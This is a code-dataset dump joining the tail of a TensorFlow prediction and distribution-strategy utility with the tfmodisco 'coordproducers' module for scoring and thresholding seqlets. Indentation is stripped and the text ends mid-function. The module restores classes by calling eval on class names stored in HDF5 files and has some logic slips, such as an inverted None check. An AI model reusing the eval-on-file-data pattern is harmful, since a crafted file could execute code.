if i == 0 and record_image_samples:
prediction_batch['image_samples'] = inputs_i
writers['small'].write_batch(prediction_batch)
prediction_batch[samples_key] = outputs_i
writers['full'].write_batch(prediction_batch)
# Don't predict whole ImageNet training set
if i > max_batches:
break
if writers is None:
image_samples = inputs_i # pylint: disable=undefined-loop-variable
labels = np.stack(labels, axis=0)
outputs = np.concatenate(outputs, axis=0)
stats = {'labels': labels, 'image_samples': image_samples,
samples_key: outputs, 'probs': avg_probs_fn(outputs)}
if record_image_samples:
stats['image_samples'] = image_samples
return stats
def download_dataset(dataset, batch_size_for_dl=1024):
logging.info('Starting dataset download...')
tup = list(zip(*tfds.as_numpy(dataset.batch(batch_size_for_dl))))
logging.info('dataset download complete.')
return tuple(np.concatenate(x, axis=0) for x in tup)
def get_distribution_strategy(distribution_strategy='default',
num_gpus=0,
num_workers=1,
all_reduce_alg=None,
num_packs=1):
"""Return a DistributionStrategy for running the model.
Args:
distribution_strategy: a string specifying which distribution strategy to
use. Accepted values are 'off', 'default', 'one_device', 'mirrored',
'parameter_server', 'multi_worker_mirrored', case insensitive. 'off' means
not to use Distribution Strategy; 'default' means to choose from
`MirroredStrategy`, `MultiWorkerMirroredStrategy`, or `OneDeviceStrategy`
according to the number of GPUs and number of workers.
num_gpus: Number of GPUs to run this model.
num_workers: Number of workers to run this model.
all_reduce_alg: Optional. Specifies which algorithm to use when performing
all-reduce. For `MirroredStrategy`, valid values are 'nccl' and
'hierarchical_copy'. For `MultiWorkerMirroredStrategy`, valid values are
'ring' and 'nccl'. If None, DistributionStrategy will choose based on
device topology.
num_packs: Optional. Sets the `num_packs` in `tf.distribute.NcclAllReduce`
or `tf.distribute.HierarchicalCopyAllReduce` for `MirroredStrategy`.
Returns:
tf.distribute.DistibutionStrategy object.
Raises:
ValueError: if `distribution_strategy` is 'off' or 'one_device' and
`num_gpus` is larger than 1; or `num_gpus` is negative.
"""
if num_gpus < 0:
raise ValueError('`num_gpus` can not be negative.')
distribution_strategy = distribution_strategy.lower()
if distribution_strategy == 'off':
if num_gpus > 1:
raise ValueError(
'When {} GPUs and {} workers are specified, distribution_strategy '
'flag cannot be set to "off".'.format(num_gpus, num_workers))
return None
if distribution_strategy == 'multi_worker_mirrored':
return tf.distribute.experimental.MultiWorkerMirroredStrategy(
communication=_collective_communication(all_reduce_alg))
if (distribution_strategy == 'one_device' or
(distribution_strategy == 'default' and num_gpus <= 1)):
if num_gpus == 0:
return tf.distribute.OneDeviceStrategy('device:CPU:0')
else:
if num_gpus > 1:
raise ValueError('`OneDeviceStrategy` can not be used for more than '
'one device.')
return tf.distribute.OneDeviceStrategy('device:GPU:0')
if distribution_strategy in ('mirrored', 'default'):
if num_gpus == 0:
assert distribution_strategy == 'mirrored'
devices = ['device:CPU:0']
else:
devices = ['device:GPU:%d' % i for i in range(num_gpus)]
return tf.distribute.MirroredStrategy(
devices=devices,
cross_device_ops=_mirrored_cross_device_ops(all_reduce_alg, num_packs))
if distribution_strategy == 'parameter_server':
return tf.compat.v1.distribute.experimental.ParameterServerStrategy()
raise ValueError(
'Unrecognized Distribution Strategy: %r' % distribution_strategy)
def _collective_communication(all_reduce_alg):
"""Return a CollectiveCommunication based on all_reduce_alg.
Args:
all_reduce_alg: a string specifying which collective communication to pick,
or None.
Returns:
tf.distribute.experimental.CollectiveCommunication object
Raises:
ValueError: if `all_reduce_alg` not in [None, 'ring', 'nccl']
"""
collective_communication_options = {
None: tf.distribute.experimental.CollectiveCommunication.AUTO,
'ring': tf.distribute.experimental.CollectiveCommunication.RING,
'nccl': tf.distribute.experimental.CollectiveCommunication.NCCL
}
if all_reduce_alg not in collective_communication_options:
raise ValueError(
'When used with `multi_worker_mirrored`, valid values for '
'all_reduce_alg are ["ring", "nccl"]. Supplied value: {}'.format(
all_reduce_alg))
return collective_communication_options[all_reduce_alg]
def _mirrored_cross_device_ops(all_reduce_alg, num_packs):
"""Return a CrossDeviceOps based on all_reduce_alg and num_packs.
Args:
all_reduce_alg: a string specifying which cross device op to pick, or None.
num_packs: an integer specifying number of packs for the cross device op.
Returns:
tf.distribute.CrossDeviceOps object or None.
Raises:
ValueError: if `all_reduce_alg` not in [None, 'nccl', 'hierarchical_copy'].
"""
if all_reduce_alg is None:
return None
mirrored_all_reduce_options = {
'nccl': tf.distribute.NcclAllReduce,
'hierarchical_copy': tf.distribute.HierarchicalCopyAllReduce
}
if all_reduce_alg not in mirrored_all_reduce_options:
raise ValueError(
'When used with `mirrored`, valid values for all_reduce_alg are '
'["nccl", "hierarchical_copy"]. Supplied value: {}'.format(
all_reduce_alg))
cross_device_ops_class = mirrored_all_reduce_options[all_reduce_alg]
return cross_device_ops_class(num_packs=num_packs)
| 1.765625 | 2 |
modisco/coordproducers.py | Bluedragon137/tfmodisco | 0 | 17675 | from __future__ import division, print_function, absolute_import
from .core import SeqletCoordinates
from modisco import util
import numpy as np
from collections import defaultdict, Counter, OrderedDict
import itertools
import sys
import time
from .value_provider import (
AbstractValTransformer, AbsPercentileValTransformer,
SignedPercentileValTransformer, PrecisionValTransformer)
import scipy
from sklearn.isotonic import IsotonicRegression
SUBSAMPLE_CAP = 1000000
#The only parts of TransformAndThresholdResults that are used in
# TfModiscoWorkflow are the transformed_pos/neg_thresholds and the
# val_transformer (used in metaclustering with multiple tasks)
#TransformAndThresholdResults are also used to be
# able to replicate the same procedure used for identifying coordinates as
# when TfMoDisco was first run; the information needed in that case would
# be specific to the type of Coordproducer used
class AbstractTransformAndThresholdResults(object):
def __init__(self, transformed_neg_threshold, transformed_pos_threshold,
val_transformer):
self.transformed_neg_threshold = transformed_neg_threshold
self.transformed_pos_threshold = transformed_pos_threshold
self.val_transformer = val_transformer
@classmethod
def from_hdf5(cls, grp):
if "class" not in grp.attrs:
the_class = FWACTransformAndThresholdResults
else:
the_class = eval(grp.attrs["class"])
if (the_class.__name__ != cls.__name__):
return the_class.from_hdf5(grp)
class BasicTransformAndThresholdResults(AbstractTransformAndThresholdResults):
def save_hdf5(self, grp):
grp.attrs["class"] = type(self).__name__
grp.attrs["transformed_neg_threshold"] = self.transformed_neg_threshold
grp.attrs["transformed_pos_threshold"] = self.transformed_pos_threshold
self.val_transformer.save_hdf5(grp.create_group("val_transformer"))
@classmethod
def load_basic_attrs_from_hdf5(cls, grp):
transformed_neg_threshold = grp.attrs['transformed_neg_threshold']
transformed_pos_threshold = grp.attrs['transformed_pos_threshold']
val_transformer = AbstractValTransformer.from_hdf5(
grp["val_transformer"])
return (transformed_neg_threshold, transformed_pos_threshold,
val_transformer)
@classmethod
def from_hdf5(cls, grp):
the_class = eval(grp.attrs["class"])
(transformed_neg_threshold,
transformed_pos_threshold,
val_transformer) = cls.load_basic_attrs_from_hdf5(grp)
return cls(transformed_neg_threshold=transformed_neg_threshold,
transformed_pos_threshold=transformed_pos_threshold,
val_transformer=val_transformer)
#FWAC = FixedWindowAroundChunks; this TransformAndThresholdResults object
# is specific to the type of info needed in that case.
class FWACTransformAndThresholdResults(
BasicTransformAndThresholdResults):
def __init__(self, neg_threshold,
transformed_neg_threshold,
pos_threshold,
transformed_pos_threshold,
val_transformer):
#both 'transformed_neg_threshold' and 'transformed_pos_threshold'
# should be positive, i.e. they should be relative to the
# transformed distribution used to set the threshold, e.g. a
# cdf value
self.neg_threshold = neg_threshold
self.pos_threshold = pos_threshold
super(FWACTransformAndThresholdResults, self).__init__(
transformed_neg_threshold=transformed_neg_threshold,
transformed_pos_threshold=transformed_pos_threshold,
val_transformer=val_transformer)
def save_hdf5(self, grp):
super(FWACTransformAndThresholdResults, self).save_hdf5(grp)
grp.attrs["neg_threshold"] = self.neg_threshold
grp.attrs["pos_threshold"] = self.pos_threshold
@classmethod
def from_hdf5(cls, grp):
(transformed_neg_threshold, transformed_pos_threshold,
val_transformer) = cls.load_basic_attrs_from_hdf5(grp)
neg_threshold = grp.attrs['neg_threshold']
pos_threshold = grp.attrs['pos_threshold']
return cls(neg_threshold=neg_threshold,
transformed_neg_threshold=transformed_neg_threshold,
pos_threshold=pos_threshold,
transformed_pos_threshold=transformed_pos_threshold,
val_transformer=val_transformer)
class AbstractCoordProducer(object):
def __call__(self):
raise NotImplementedError()
@classmethod
def from_hdf5(cls, grp):
the_class = eval(grp.attrs["class"])
return the_class.from_hdf5(grp)
class SeqletCoordsFWAP(SeqletCoordinates):
"""
Coordinates for the FixedWindowAroundChunks CoordProducer
"""
def __init__(self, example_idx, start, end, score, other_info={}):
self.score = score
self.other_info = other_info
super(SeqletCoordsFWAP, self).__init__(
example_idx=example_idx,
start=start, end=end,
is_revcomp=False)
class CoordProducerResults(object):
def __init__(self, coords, tnt_results):
self.coords = coords
self.tnt_results = tnt_results
@classmethod
def from_hdf5(cls, grp):
coord_strings = util.load_string_list(dset_name="coords",
grp=grp)
coords = [SeqletCoordinates.from_string(x) for x in coord_strings]
tnt_results = AbstractTransformAndThresholdResults.from_hdf5(
grp["tnt_results"])
return CoordProducerResults(coords=coords,
tnt_results=tnt_results)
def save_hdf5(self, grp):
util.save_string_list(
string_list=[str(x) for x in self.coords],
dset_name="coords",
grp=grp)
self.tnt_results.save_hdf5(
grp=grp.create_group("tnt_results"))
def get_simple_window_sum_function(window_size):
def window_sum_function(arrs):
to_return = []
for arr in arrs:
cumsum = np.cumsum(arr)
cumsum = np.array([0]+list(cumsum))
to_return.append(cumsum[window_size:]-cumsum[:-window_size])
return to_return
return window_sum_function
class GenerateNullDist(object):
def __call__(self, score_track):
raise NotImplementedError()
class TakeSign(GenerateNullDist):
@classmethod
def from_hdf5(cls, grp):
raise NotImplementedError()
def save_hdf(cls, grp):
raise NotImplementedError()
def __call__(self, score_track):
null_tracks = [np.sign(x) for x in score_track]
return null_tracks
class TakeAbs(GenerateNullDist):
@classmethod
def from_hdf5(cls, grp):
raise NotImplementedError()
def save_hdf(cls, grp):
raise NotImplementedError()
def __call__(self, score_track):
null_tracks = [np.abs(x) for x in score_track]
return null_tracks
class LaplaceNullDist(GenerateNullDist):
def __init__(self, num_to_samp, verbose=True,
percentiles_to_use=[5*(x+1) for x in range(19)],
random_seed=1234):
self.num_to_samp = num_to_samp
self.verbose = verbose
self.percentiles_to_use = np.array(percentiles_to_use)
self.random_seed = random_seed
self.rng = np.random.RandomState()
@classmethod
def from_hdf5(cls, grp):
num_to_samp = grp.attrs["num_to_samp"]
verbose = grp.attrs["verbose"]
percentiles_to_use = np.array(grp["percentiles_to_use"][:])
return cls(num_to_samp=num_to_samp, verbose=verbose)
def save_hdf5(self, grp):
grp.attrs["class"] = type(self).__name__
grp.attrs["num_to_samp"] = self.num_to_samp
grp.attrs["verbose"] = self.verbose
grp.create_dataset('percentiles_to_use',
data=self.percentiles_to_use)
def __call__(self, score_track, window_size, original_summed_score_track):
#original_summed_score_track is supplied to avoid recomputing it
if (original_summed_score_track is None):
window_sum_function = get_simple_window_sum_function(window_size)
original_summed_score_track = window_sum_function(arrs=score_track)
values = np.concatenate(original_summed_score_track, axis=0)
# first estimate mu, using two level histogram to get to 1e-6
hist1, bin_edges1 = np.histogram(values, bins=1000)
peak1 = np.argmax(hist1)
l_edge = bin_edges1[peak1]
r_edge = bin_edges1[peak1+1]
top_values = values[ (l_edge < values) & (values < r_edge) ]
hist2, bin_edges2 = np.histogram(top_values, bins=1000)
peak2 = np.argmax(hist2)
l_edge = bin_edges2[peak2]
r_edge = bin_edges2[peak2+1]
mu = (l_edge + r_edge) / 2
if (self.verbose):
print("peak(mu)=", mu)
pos_values = [x for x in values if x >= mu]
neg_values = [x for x in values if x <= mu]
#for an exponential distribution:
# cdf = 1 - exp(-lambda*x)
# exp(-lambda*x) = 1-cdf
# -lambda*x = log(1-cdf)
# lambda = -log(1-cdf)/x
# x = -log(1-cdf)/lambda
#Take the most aggressive lambda over all percentiles
pos_laplace_lambda = np.max(
-np.log(1-(self.percentiles_to_use/100.0))/
(np.percentile(a=pos_values, q=self.percentiles_to_use)-mu))
neg_laplace_lambda = np.max(
-np.log(1-(self.percentiles_to_use/100.0))/
(np.abs(np.percentile(a=neg_values,
q=100-self.percentiles_to_use)-mu)))
self.rng.seed(self.random_seed)
prob_pos = float(len(pos_values))/(len(pos_values)+len(neg_values))
sampled_vals = []
for i in range(self.num_to_samp):
sign = 1 if (self.rng.uniform() < prob_pos) else -1
if (sign == 1):
sampled_cdf = self.rng.uniform()
val = -np.log(1-sampled_cdf)/pos_laplace_lambda + mu
else:
sampled_cdf = self.rng.uniform()
val = mu + np.log(1-sampled_cdf)/neg_laplace_lambda
sampled_vals.append(val)
return np.array(sampled_vals)
class FlipSignNullDist(GenerateNullDist):
def __init__(self, num_seq_to_samp, shuffle_pos=False,
seed=1234, num_breaks=100,
lower_null_percentile=20,
upper_null_percentile=80):
self.num_seq_to_samp = num_seq_to_samp
self.shuffle_pos = shuffle_pos
self.seed = seed
self.rng = np.random.RandomState()
self.num_breaks = num_breaks
self.lower_null_percentile = lower_null_percentile
self.upper_null_percentile = upper_null_percentile
@classmethod
def from_hdf5(cls, grp):
raise NotImplementedError()
def save_hdf(cls, grp):
raise NotImplementedError()
def __call__(self, score_track, windowsize, original_summed_score_track):
#summed_score_track is supplied to avoid recomputing it
window_sum_function = get_simple_window_sum_function(windowsize)
if (original_summed_score_track is not None):
original_summed_score_track = window_sum_function(arrs=score_track)
all_orig_summed_scores = np.concatenate(
original_summed_score_track, axis=0)
pos_threshold = np.percentile(a=all_orig_summed_scores,
q=self.upper_null_percentile)
neg_threshold = np.percentile(a=all_orig_summed_scores,
q=self.lower_null_percentile)
#retain only the portions of the tracks that are under the
# thresholds
retained_track_portions = []
num_pos_vals = 0
num_neg_vals = 0
for (single_score_track, single_summed_score_track)\
in zip(score_track, original_summed_score_track):
window_passing_track = [
(1.0 if (x > neg_threshold and x < pos_threshold) else 0)
for x in single_summed_score_track]
padded_window_passing_track = [0.0]*int(windowsize-1)
padded_window_passing_track.extend(window_passing_track)
padded_window_passing_track.extend([0.0]*int(windowsize-1))
pos_in_passing_window = window_sum_function(
[padded_window_passing_track])[0]
assert len(single_score_track)==len(pos_in_passing_window)
single_retained_track = []
for (val, pos_passing) in zip(single_score_track,
pos_in_passing_window):
if (pos_passing > 0):
single_retained_track.append(val)
num_pos_vals += (1 if val > 0 else 0)
num_neg_vals += (1 if val < 0 else 0)
retained_track_portions.append(single_retained_track)
print("Fraction of positions retained:",
sum(len(x) for x in retained_track_portions)/
sum(len(x) for x in score_track))
prob_pos = num_pos_vals/float(num_pos_vals + num_neg_vals)
self.rng.seed(self.seed)
null_tracks = []
for i in range(self.num_seq_to_samp):
random_track = retained_track_portions[
int(self.rng.randint(0,len(retained_track_portions)))]
track_with_sign_flips = np.array([
abs(x)*(1 if self.rng.uniform() < prob_pos else -1)
for x in random_track])
if (self.shuffle_pos):
self.rng.shuffle(track_with_sign_flips)
null_tracks.append(track_with_sign_flips)
return np.concatenate(window_sum_function(null_tracks), axis=0)
def get_null_vals(null_track, score_track, window_size,
original_summed_score_track):
if (hasattr(null_track, '__call__')):
null_vals = null_track(
score_track=score_track,
window_size=window_size,
original_summed_score_track=original_summed_score_track)
else:
window_sum_function = get_simple_window_sum_function(window_size)
null_summed_score_track = window_sum_function(arrs=null_track)
null_vals = list(np.concatenate(null_summed_score_track, axis=0))
return null_vals
def subsample_if_large(arr):
if (len(arr) > SUBSAMPLE_CAP):
print("Subsampling!")
sys.stdout.flush()
arr = np.random.RandomState(1234).choice(a=arr, size=SUBSAMPLE_CAP,
replace=False)
return arr
def irval_to_probpos(irval, frac_neg):
#n(x):= pdf of null dist (negatives)
#p(x):= pdf of positive distribution
#f_p:= fraction of positives
#f_n:= fraction of negatives = 1-f_p
#o(x):= pdf of observed distribution = n(x)f_n + p(x)f_p
#The isotonic regression produces a(x) = o(x)/[o(x) + n(x)]
# o(x)/[o(x) + n(x)] = [n(x)f_n + o(x)f_p]/[n(x)(1+f_n) + p(x)]
# a(x)[n(x)(1+f_n) + p(x)f_p] = n(x)f_n + p(x)f_p
# a(x)n(x)(1+f_n) - n(x)f_n = p(x)f_p - a(x)p(x)f_p
# n(x)[a(x)(1+f_n) - f_n] = p(x)f_p[1 - a(x)]
# [a(x)/f_n + (a(x)-1)]/[1-a(x)] = (p(x)f_p)/(n(x)f_n) = r(x)
#p_pos = 1 / (1 + 1/r(x))
# = [a(x)/f_n + (a(x)-1)]/[a(x)/f_n + (a(x)-1) + (1-a(x))]
# = [a(x)/f_n + a(x)-1]/[a(x)/f_n]
# = [a(x) + f_n(a(x)-1)]/a(x)
# = 1 + f_n(a(x)-1)/a(x)
# = 1 + f_n(1 - 1/a(x))
#If solving for p_pos=0, we have -1/(1 - 1/a(x)) = f_n
#As f_n --> 100%, p_pos --> 2 - 1/a(x); this assumes max(a(x)) = 0.5
return np.minimum(np.maximum(1 + frac_neg*(
1 - (1/np.maximum(irval,1e-7))), 0.0), 1.0)
class SavableIsotonicRegression(object):
def __init__(self, origvals, nullvals, increasing, min_frac_neg=0.95):
self.origvals = origvals
self.nullvals = nullvals
self.increasing = increasing
self.min_frac_neg = min_frac_neg
self.ir = IsotonicRegression(out_of_bounds='clip',
increasing=increasing).fit(
X=np.concatenate([self.origvals, self.nullvals], axis=0),
y=([1.0 for x in self.origvals] + [0.0 for x in self.nullvals]),
sample_weight=([1.0 for x in self.origvals]
+[float(len(self.origvals))/len(self.nullvals)
for x in self.nullvals]))
#Infer frac_pos based on the minimum value of the ir probs
#See derivation in irval_to_probpos function
min_prec_x = self.ir.X_min_ if self.increasing else self.ir.X_max_
min_precision = self.ir.transform([min_prec_x])[0]
implied_frac_neg = -1/(1-(1/max(min_precision,1e-7)))
print("For increasing =",increasing,", the minimum IR precision was",
min_precision,"occurring at",min_prec_x,
"implying a frac_neg",
"of",implied_frac_neg)
if (implied_frac_neg > 1.0 or implied_frac_neg < self.min_frac_neg):
implied_frac_neg = max(min(1.0,implied_frac_neg),
self.min_frac_neg)
print("To be conservative, adjusted frac neg is",implied_frac_neg)
self.implied_frac_neg = implied_frac_neg
def transform(self, vals):
return irval_to_probpos(self.ir.transform(vals),
frac_neg=self.implied_frac_neg)
def save_hdf5(self, grp):
grp.attrs['increasing'] = self.increasing
grp.attrs['min_frac_neg'] = self.min_frac_neg
grp.create_dataset('origvals', data=self.origvals)
grp.create_dataset('nullvals', data=self.nullvals)
@classmethod
def from_hdf5(cls, grp):
increasing = grp.attrs['increasing']
min_frac_neg = grp.attrs['min_frac_neg']
origvals = np.array(grp['origvals'])
nullvals = np.array(grp['nullvals'])
return cls(origvals=origvals, nullvals=nullvals,
increasing=increasing, min_frac_neg=min_frac_neg)
def get_isotonic_regression_classifier(orig_vals, null_vals):
orig_vals = subsample_if_large(orig_vals)
null_vals = subsample_if_large(null_vals)
pos_orig_vals = (
np.array(sorted([x for x in orig_vals if x >= 0])))
neg_orig_vals = (
np.array(sorted([x for x in orig_vals if x < 0],
key=lambda x: abs(x))))
pos_null_vals = [x for x in null_vals if x >= 0]
neg_null_vals = [x for x in null_vals if x < 0]
pos_ir = SavableIsotonicRegression(origvals=pos_orig_vals,
nullvals=pos_null_vals, increasing=True)
if (len(neg_orig_vals) > 0):
neg_ir = SavableIsotonicRegression(origvals=neg_orig_vals,
nullvals=neg_null_vals, increasing=False)
else:
neg_ir = None
return pos_ir, neg_ir, orig_vals, null_vals
#sliding in this case would be a list of values
class VariableWindowAroundChunks(AbstractCoordProducer):
count = 0
def __init__(self, sliding, flank, suppress, target_fdr,
min_passing_windows_frac, max_passing_windows_frac,
separate_pos_neg_thresholds,
max_seqlets_total,
progress_update=5000,
verbose=True, plot_save_dir="figures"):
self.sliding = sliding
self.flank = flank
self.suppress = suppress
self.target_fdr = target_fdr
assert max_passing_windows_frac >= min_passing_windows_frac
self.min_passing_windows_frac = min_passing_windows_frac
self.max_passing_windows_frac = max_passing_windows_frac
self.separate_pos_neg_thresholds = separate_pos_neg_thresholds
self.max_seqlets_total = None
self.progress_update = progress_update
self.verbose = verbose
self.plot_save_dir = plot_save_dir
@classmethod
def from_hdf5(cls, grp):
sliding = np.array(grp["sliding"]).astype("int")
flank = grp.attrs["flank"]
suppress = grp.attrs["suppress"]
target_fdr = grp.attrs["target_fdr"]
min_passing_windows_frac = grp.attrs["min_passing_windows_frac"]
max_passing_windows_frac = grp.attrs["max_passing_windows_frac"]
separate_pos_neg_thresholds = grp.attrs["separate_pos_neg_thresholds"]
if ("max_seqlets_total" in grp.attrs):
max_seqlets_total = grp.attrs["max_seqlets_total"]
else:
max_seqlets_total = None
progress_update = grp.attrs["progress_update"]
verbose = grp.attrs["verbose"]
return cls(sliding=sliding, flank=flank, suppress=suppress,
target_fdr=target_fdr,
min_passing_windows_frac=min_passing_windows_frac,
max_passing_windows_frac=max_passing_windows_frac,
separate_pos_neg_thresholds=separate_pos_neg_thresholds,
max_seqlets_total=max_seqlets_total,
progress_update=progress_update, verbose=verbose)
def save_hdf5(self, grp):
grp.attrs["class"] = type(self).__name__
grp.create_dataset("sliding", data=np.array(self.sliding))
grp.attrs["flank"] = self.flank
grp.attrs["suppress"] = self.suppress
grp.attrs["target_fdr"] = self.target_fdr
grp.attrs["min_passing_windows_frac"] = self.min_passing_windows_frac
grp.attrs["max_passing_windows_frac"] = self.max_passing_windows_frac
grp.attrs["separate_pos_neg_thresholds"] =\
self.separate_pos_neg_thresholds
if (self.max_seqlets_total is not None):
grp.attrs["max_seqlets_total"] = self.max_seqlets_total
grp.attrs["progress_update"] = self.progress_update
grp.attrs["verbose"] = self.verbose
def fit_pos_and_neg_irs(self, score_track, null_track):
pos_irs = []
neg_irs = []
for sliding_window_size in self.sliding:
window_sum_function = get_simple_window_sum_function(
sliding_window_size)
print("Fitting - on window size",sliding_window_size)
if (hasattr(null_track, '__call__')):
null_vals = null_track(
score_track=score_track,
window_size=sliding_window_size,
original_summed_score_track=None)
else:
null_summed_score_track = window_sum_function(arrs=null_track)
null_vals = np.concatenate(null_summed_score_track,
axis=0)
print("Computing window sums")
sys.stdout.flush()
window_sums_rows = window_sum_function(arrs=score_track)
print("Done computing window sums")
sys.stdout.flush()
orig_vals = np.concatenate(window_sums_rows, axis=0)
pos_ir, neg_ir, subsampled_orig_vals, subsampled_null_vals =\
get_isotonic_regression_classifier(
orig_vals=np.concatenate(window_sums_rows, axis=0),
null_vals=null_vals)
make_nulldist_figure(orig_vals=subsampled_orig_vals,
null_vals=subsampled_null_vals,
pos_ir=pos_ir, neg_ir=neg_ir,
pos_threshold=None,
neg_threshold=None)
util.show_or_savefig(plot_save_dir=self.plot_save_dir,
filename="scoredist_window"
+str(sliding_window_size)+"_"
+str(VariableWindowAroundChunks.count)+".png")
pos_irs.append(pos_ir)
neg_irs.append(neg_ir)
return pos_irs, neg_irs
def __call__(self, score_track, null_track, tnt_results=None):
if (tnt_results is None):
pos_irs, neg_irs = self.fit_pos_and_neg_irs(
score_track=score_track,
null_track=null_track)
precision_transformer = PrecisionValTransformer(
sliding_window_sizes=self.sliding,
pos_irs=pos_irs,
neg_irs=neg_irs)
(precisiontransformed_score_track,
precisiontransformed_bestwindowsizeidxs) =\
precision_transformer.transform_score_track(
score_track=score_track)
subsampled_prec_vals = subsample_if_large(
np.concatenate(precisiontransformed_score_track, axis=0))
from matplotlib import pyplot as plt
plt.plot(sorted(subsampled_prec_vals),
(np.arange(len(subsampled_prec_vals))/
len(subsampled_prec_vals)))
plt.xlabel("Tranformed IR precision value")
plt.ylabel("CDF")
util.show_or_savefig(plot_save_dir=self.plot_save_dir,
filename="final_prec_vals_cdf_dist"
+str(VariableWindowAroundChunks.count)+".png")
#Pick a threshold according the the precisiontransformed score track
pos_threshold = (1-self.target_fdr)
neg_threshold = -(1-self.target_fdr)
pos_threshold, neg_threshold =\
refine_thresholds_based_on_frac_passing(
vals=subsampled_prec_vals,
pos_threshold=pos_threshold,
neg_threshold=neg_threshold,
min_passing_windows_frac=self.min_passing_windows_frac,
max_passing_windows_frac=self.max_passing_windows_frac,
separate_pos_neg_thresholds=self.separate_pos_neg_thresholds,
verbose=self.verbose)
tnt_results = BasicTransformAndThresholdResults(
transformed_neg_threshold=neg_threshold,
transformed_pos_threshold=pos_threshold,
val_transformer=precision_transformer)
else:
precision_transformer = tnt_results.val_transformer
(precisiontransformed_score_track,
precisiontransformed_bestwindowsizeidxs) =\
precision_transformer.transform_score_track(
score_track=score_track)
#Need to remove padding because identify_coords is assumed to
# operate on a scoretrack that has already been processed with
# a sliding window of window_size (and assumes that partial windows
# were not included)
left_padding_to_remove = int((max(self.sliding)-1)/2)
right_padding_to_remove = (max(self.sliding)-1)-left_padding_to_remove
coords = identify_coords(
score_track=[x[left_padding_to_remove:-right_padding_to_remove]
for x in precisiontransformed_score_track],
pos_threshold=tnt_results.transformed_pos_threshold,
neg_threshold=tnt_results.transformed_neg_threshold,
window_size=max(self.sliding),
flank=self.flank,
suppress=self.suppress,
max_seqlets_total=self.max_seqlets_total,
verbose=self.verbose,
other_info_tracks={'best_window_idx':
[x[left_padding_to_remove:-right_padding_to_remove] for x in
precisiontransformed_bestwindowsizeidxs]})
VariableWindowAroundChunks.count += 1
return CoordProducerResults(
coords=coords,
tnt_results=tnt_results)
#identify_coords is expecting something that has already been processed
# with sliding windows of size window_size
def identify_coords(score_track, pos_threshold, neg_threshold,
window_size, flank, suppress,
max_seqlets_total, verbose, other_info_tracks={}):
for other_info_track in other_info_tracks.values():
assert all([x.shape==y.shape for x,y
in zip(other_info_track,score_track)])
#cp_score_track = 'copy' of the score track, which can be modified as
# coordinates are identified
cp_score_track = [np.array(x) for x in score_track]
#if a position is less than the threshold, set it to -np.inf
#Note that the threshold comparisons need to be >= and not just > for
# cases where there are lots of ties at the high end (e.g. with an IR
# tranformation that gives a lot of values that have a precision of 1.0)
cp_score_track = [
np.array([np.abs(y) if (y >= pos_threshold
or y <= neg_threshold)
else -np.inf for y in x])
for x in cp_score_track]
coords = []
for example_idx,single_score_track in enumerate(cp_score_track):
#set the stuff near the flanks to -np.inf so that we
# don't pick it up during argmax
single_score_track[0:flank] = -np.inf
single_score_track[len(single_score_track)-(flank):
len(single_score_track)] = -np.inf
while True:
argmax = np.argmax(single_score_track,axis=0)
max_val = single_score_track[argmax]
#bail if exhausted everything that passed the threshold
#and was not suppressed
if (max_val == -np.inf):
break
#need to be able to expand without going off the edge
if ((argmax >= flank) and
(argmax < (len(single_score_track)-flank))):
coord = SeqletCoordsFWAP(
example_idx=example_idx,
start=argmax-flank,
end=argmax+window_size+flank,
score=score_track[example_idx][argmax],
other_info = dict([
(track_name, track[example_idx][argmax])
for (track_name, track) in other_info_tracks.items()]))
assert (coord.score >= pos_threshold
or coord.score <= neg_threshold)
coords.append(coord)
else:
assert False,\
("This shouldn't happen because I set stuff near the"
"border to -np.inf early on")
#suppress the chunks within +- suppress
left_supp_idx = int(max(np.floor(argmax+0.5-suppress),0))
right_supp_idx = int(min(np.ceil(argmax+0.5+suppress),
len(single_score_track)))
single_score_track[left_supp_idx:right_supp_idx] = -np.inf
if (verbose):
print("Got "+str(len(coords))+" coords")
sys.stdout.flush()
if ((max_seqlets_total is not None) and
len(coords) > max_seqlets_total):
if (verbose):
print("Limiting to top "+str(max_seqlets_total))
sys.stdout.flush()
coords = sorted(coords, key=lambda x: -np.abs(x.score))\
[:max_seqlets_total]
return coords
def refine_thresholds_based_on_frac_passing(
vals, pos_threshold, neg_threshold,
min_passing_windows_frac, max_passing_windows_frac,
separate_pos_neg_thresholds, verbose):
frac_passing_windows =(
sum(vals >= pos_threshold)
+ sum(vals <= neg_threshold))/float(len(vals))
if (verbose):
print("Thresholds from null dist were",
neg_threshold," and ",pos_threshold,
"with frac passing", frac_passing_windows)
pos_vals = [x for x in vals if x >= 0]
neg_vals = [x for x in vals if x < 0]
#deal with edge case of len < 0
pos_vals = [0] if len(pos_vals)==0 else pos_vals
neg_vals = [0] if len(neg_vals)==0 else neg_vals
#adjust the thresholds if the fall outside the min/max
# windows frac
if (frac_passing_windows < min_passing_windows_frac):
if (verbose):
print("Passing windows frac was",
frac_passing_windows,", which is below ",
min_passing_windows_frac,"; adjusting")
if (separate_pos_neg_thresholds):
pos_threshold = np.percentile(
a=pos_vals,
q=100*(1-min_passing_windows_frac))
neg_threshold = np.percentile(
a=neg_vals,
q=100*(min_passing_windows_frac))
else:
pos_threshold = np.percentile(
a=np.abs(vals),
q=100*(1-min_passing_windows_frac))
neg_threshold = -pos_threshold
if (frac_passing_windows > max_passing_windows_frac):
if (verbose):
print("Passing windows frac was",
frac_passing_windows,", which is above ",
max_passing_windows_frac,"; adjusting")
if (separate_pos_neg_thresholds):
pos_threshold = np.percentile(
a=pos_vals,
q=100*(1-max_passing_windows_frac))
neg_threshold = np.percentile(
a=neg_vals,
q=100*(max_passing_windows_frac))
else:
pos_threshold = np.percentile(
a=np.abs(vals),
q=100*(1-max_passing_windows_frac))
neg_threshold = -pos_threshold
if (verbose):
print("New thresholds are",pos_threshold,"and",neg_threshold)
return pos_threshold, neg_threshold
def make_nulldist_figure(orig_vals, null_vals, pos_ir, neg_ir,
pos_threshold, neg_threshold):
from matplotlib import pyplot as plt
fig,ax1 = plt.subplots()
orig_vals = np.array(sorted(orig_vals))
ax1.hist(orig_vals, bins=100, density=True, alpha=0.5)
ax1.hist(null_vals, bins=100, density=True, alpha=0.5)
ax1.set_ylabel("Probability density\n(blue=foreground, orange=null)")
ax1.set_xlabel("Total importance in window")
precisions = pos_ir.transform(orig_vals)
if (neg_ir is not None):
precisions = np.maximum(precisions, neg_ir.transform(orig_vals))
ax2 = ax1.twinx()
ax2.plot(orig_vals, precisions)
if (pos_threshold is not None):
ax2.plot([pos_threshold, pos_threshold], [0.0, 1.0], color="red")
if (neg_threshold is not None):
